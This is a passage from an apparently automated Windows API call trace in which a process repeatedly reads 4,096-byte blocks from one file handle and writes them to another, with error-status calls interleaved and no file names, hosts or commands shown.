lpOverlapped=0x0) returned 1 [0101.619] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.620] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.620] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.620] GetLastError () returned 0x0 [0101.620] SetLastError (dwErrCode=0x0) [0101.620] GetLastError () returned 0x0 [0101.620] SetLastError (dwErrCode=0x0) [0101.620] GetLastError () returned 0x0 [0101.620] SetLastError (dwErrCode=0x0) [0101.620] GetLastError () returned 0x0 [0101.620] SetLastError (dwErrCode=0x0) [0101.620] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.620] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.620] GetLastError () returned 0x0 [0101.620] SetLastError (dwErrCode=0x0) [0101.620] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.621] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.621] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] GetLastError () returned 0x0 [0101.621] SetLastError (dwErrCode=0x0) [0101.621] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.621] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.622] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] GetLastError () returned 0x0 [0101.622] SetLastError (dwErrCode=0x0) [0101.622] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.693] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.694] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] GetLastError () returned 0x0 [0101.694] SetLastError (dwErrCode=0x0) [0101.694] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.695] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.695] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.695] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.695] GetLastError () returned 0x0 [0101.695] SetLastError (dwErrCode=0x0) [0101.696] GetLastError () returned 0x0 [0101.696] SetLastError (dwErrCode=0x0) [0101.696] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.696] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.696] GetLastError () returned 0x0 [0101.696] SetLastError (dwErrCode=0x0) [0101.696] GetLastError () returned 0x0 [0101.696] SetLastError (dwErrCode=0x0) [0101.696] GetLastError () returned 0x0 [0101.696] SetLastError (dwErrCode=0x0) [0101.696] GetLastError () returned 0x0 [0101.696] SetLastError (dwErrCode=0x0) [0101.696] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.696] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.696] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.697] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.698] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.698] GetLastError () returned 0x0 [0101.698] SetLastError (dwErrCode=0x0) [0101.698] GetLastError () returned 0x0 [0101.698] SetLastError (dwErrCode=0x0) [0101.698] GetLastError () returned 0x0 [0101.698] SetLastError (dwErrCode=0x0) [0101.698] GetLastError () returned 0x0 [0101.698] SetLastError (dwErrCode=0x0) [0101.698] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.698] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.698] GetLastError () returned 0x0 [0101.698] SetLastError (dwErrCode=0x0) [0101.698] GetLastError () returned 0x0 [0101.698] SetLastError (dwErrCode=0x0) [0101.698] GetLastError () returned 0x0 [0101.699] SetLastError (dwErrCode=0x0) [0101.699] GetLastError () returned 0x0 [0101.699] SetLastError (dwErrCode=0x0) [0101.699] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.699] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.699] GetLastError () returned 0x0 [0101.699] SetLastError (dwErrCode=0x0) [0101.699] GetLastError () returned 0x0 [0101.699] SetLastError (dwErrCode=0x0) [0101.699] GetLastError () returned 0x0 [0101.699] SetLastError (dwErrCode=0x0) [0101.699] GetLastError () returned 0x0 [0101.699] SetLastError (dwErrCode=0x0) [0101.699] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.699] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.700] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] GetLastError () returned 0x0 [0101.700] SetLastError (dwErrCode=0x0) [0101.700] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.701] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.701] GetLastError () returned 0x0 [0101.701] SetLastError (dwErrCode=0x0) [0101.701] GetLastError () returned 0x0 [0101.701] SetLastError (dwErrCode=0x0) [0101.701] GetLastError () returned 0x0 [0101.701] SetLastError (dwErrCode=0x0) [0101.701] GetLastError () returned 0x0 [0101.701] SetLastError (dwErrCode=0x0) [0101.701] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.701] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.701] GetLastError () returned 0x0 [0101.701] SetLastError (dwErrCode=0x0) [0101.701] GetLastError () returned 0x0 [0101.701] SetLastError (dwErrCode=0x0) [0101.701] GetLastError () returned 0x0 [0101.702] SetLastError (dwErrCode=0x0) [0101.702] GetLastError () returned 0x0 [0101.702] SetLastError (dwErrCode=0x0) [0101.702] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.702] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.702] GetLastError () returned 0x0 [0101.702] SetLastError (dwErrCode=0x0) [0101.702] GetLastError () returned 0x0 [0101.702] SetLastError (dwErrCode=0x0) [0101.702] GetLastError () returned 0x0 [0101.702] SetLastError (dwErrCode=0x0) [0101.702] GetLastError () returned 0x0 [0101.702] SetLastError (dwErrCode=0x0) [0101.702] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.702] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.703] GetLastError () returned 0x0 [0101.703] SetLastError (dwErrCode=0x0) [0101.703] GetLastError () returned 0x0 [0101.703] SetLastError (dwErrCode=0x0) [0101.703] GetLastError () returned 0x0 [0101.703] SetLastError (dwErrCode=0x0) [0101.703] GetLastError () returned 0x0 [0101.703] SetLastError (dwErrCode=0x0) [0101.703] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.703] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.703] GetLastError () returned 0x0 [0101.703] SetLastError (dwErrCode=0x0) [0101.703] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.703] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.704] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.704] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.704] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.704] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.705] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.705] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.705] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.705] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.706] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.706] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.707] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.707] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.707] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.707] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.707] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.707] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.708] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.708] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.708] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.708] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.711] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.711] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.712] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, 